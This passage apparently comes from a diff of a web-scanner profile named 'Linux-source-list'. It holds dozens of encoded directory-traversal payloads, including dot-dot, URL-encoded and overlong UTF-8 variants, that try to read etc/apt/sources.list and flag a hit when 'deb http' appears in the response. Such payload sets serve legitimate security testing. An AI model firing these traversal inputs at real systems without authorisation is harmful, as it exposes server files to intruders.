x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,deb http"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-source-list","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-source-list","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/apt/sources.list","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-source-list",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
